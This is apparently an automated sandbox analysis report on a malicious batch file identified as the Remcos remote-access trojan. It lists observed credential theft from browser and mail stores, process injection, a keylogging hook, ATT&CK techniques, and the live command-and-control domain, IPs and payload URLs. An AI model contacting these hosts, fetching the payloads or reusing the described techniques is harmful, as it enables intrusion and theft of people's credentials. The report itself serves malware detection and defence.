                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,15_2_0041881C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,16_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword16_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword16_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword16_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2960, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I42HQ2Jump to behavior
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information12
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                12
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                2
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                412
                Process Injection
                1
                Software Packing
                1
                Credentials in Registry
                3
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Input Capture
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS18
                System Information Discovery
                Distributed Component Object Model2
                Clipboard Data
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets21
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture213
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540333 Sample: ZW_PCCE-010023024001.bat Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 44 rj0987654321.duckdns.org 2->44 46 geoplugin.net 2->46 48 ethys.ro 2->48 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 11 other signatures 2->74 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 44->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 82 Queues an APC in another process (thread injection) 9->82 14 msiexec.exe 8 18 9->14         started        19 conhost.exe 9->19         started        84 Suspicious powershell command line found 12->84 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 50 rj0987654321.duckdns.org 193.187.91.212, 49974, 49976, 49978 OBE-EUROPEObenetworkEuropeSE Sweden 14->50 52 geoplugin.net 178.237.33.50, 49977, 80 ATOM86-ASATOM86NL Netherlands 14->52 40 C:\Users\user\...\udmiwkqorwjzipcigan.vbs, data 14->40 dropped 42 C:\ProgramData\remcos\logs.dat, data 14->42 dropped 56 Detected Remcos RAT 14->56 58 Tries to steal Mail credentials (via file registry) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Installs a global keyboard hook 14->62 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 54 ethys.ro 81.180.144.124, 443, 49737, 49925 RCS-RDS73-75DrStaicoviciRO Romania 21->54 64 Found suspicious powershell code related to unpacking or dynamic code loading 21->64 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 86 Tries to harvest and steal browser information (history, passwords, etc) 25->86 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                ZW_PCCE-010023024001.bat8%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.imvu.comr0%URL Reputationsafe
                http://crl.microsoft0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ethys.ro
                81.180.144.124
                truefalse
                  unknown
                  rj0987654321.duckdns.org
                  193.187.91.212
                  truetrue
                    unknown
                    geoplugin.net
                    178.237.33.50
                    truefalse
                      unknown
                      s-part-0017.t-0009.fb-t-msedge.net
                      13.107.253.45
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        rj0987654321.duckdns.orgtrue
                          unknown
                          https://ethys.ro/Nonaddicting.qxdfalse
                            unknown
                            http://geoplugin.net/json.gpfalse
                            • URL Reputation: safe
                            unknown
                            https://ethys.ro/3/tVWTkim99.binfalse
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=Pbhv6BC6.tmp.15.drfalse
                                unknown
                                http://www.imvu.comrmsiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.microsoftpowershell.exe, 00000005.00000002.1669372747.00000000075BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingthbhv6BC6.tmp.15.drfalse
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://geoplugin.net/json.gp1msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://geoplugin.net/json.gp_Gmsiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.imvu.comamsiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhv6BC6.tmp.15.drfalse
                                          unknown
                                          https://deff.nelreports.net/api/report?cat=msnbhv6BC6.tmp.15.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046bhv6BC6.tmp.15.drfalse
                                            unknown
                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              unknown
                                              https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16bhv6BC6.tmp.15.drfalse
                                                unknown
                                                https://www.google.commsiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv6BC6.tmp.15.drfalse
                                                    unknown
                                                    https://contoso.com/powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ethys.ro/msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://login.yahoo.com/config/loginmsiexec.exefalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.nirsoft.net/msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://ethys.ropowershell.exe, 00000003.00000002.1453412594.0000013F81D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&bhv6BC6.tmp.15.drfalse
                                                            unknown
                                                            https://www.office.com/bhv6BC6.tmp.15.drfalse
                                                              unknown
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://go.micropowershell.exe, 00000003.00000002.1453412594.0000013F80BB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ethys.ropowershell.exe, 00000003.00000002.1453412594.0000013F81A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://geoplugin.net/json.gphymsiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.imvu.commsiexec.exe, msiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://aefd.nelreports.net/api/report?cat=wsbbhv6BC6.tmp.15.drfalse
                                                                      unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://geoplugin.net/json.gptmsiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://ethys.ro/Nonaddicting.qxdPpowershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&bhv6BC6.tmp.15.drfalse
                                                                              unknown
                                                                              https://ethys.ro/3/tVWTkim99.binTmsiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877bhv6BC6.tmp.15.drfalse
                                                                                  unknown
                                                                                  http://www.nirsoft.netUJLmsiexec.exe, 0000000F.00000002.1967891153.0000000000554000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://geoplugin.net/msiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhv6BC6.tmp.15.drfalse
                                                                                        unknown
                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhv6BC6.tmp.15.drfalse
                                                                                          unknown
                                                                                          https://aefd.nelreports.net/api/report?cat=bingrmsbhv6BC6.tmp.15.drfalse
                                                                                            unknown
                                                                                            https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                              unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://geoplugin.net/rmsiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://ethys.ro/Nonaddicting.qxdXRylpowershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  193.187.91.212
                                                                                                  rj0987654321.duckdns.orgSweden
                                                                                                  197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                                                  81.180.144.124
                                                                                                  ethys.roRomania
                                                                                                  8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                  178.237.33.50
                                                                                                  geoplugin.netNetherlands
                                                                                                  8455ATOM86-ASATOM86NLfalse
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1540333
                                                                                                  Start date and time:2024-10-23 17:21:40 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 9m 49s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:20
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:ZW_PCCE-010023024001.bat
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winBAT@22/14@10/3
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 60%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 97%
                                                                                                  • Number of executed functions: 149
                                                                                                  • Number of non-executed functions: 290
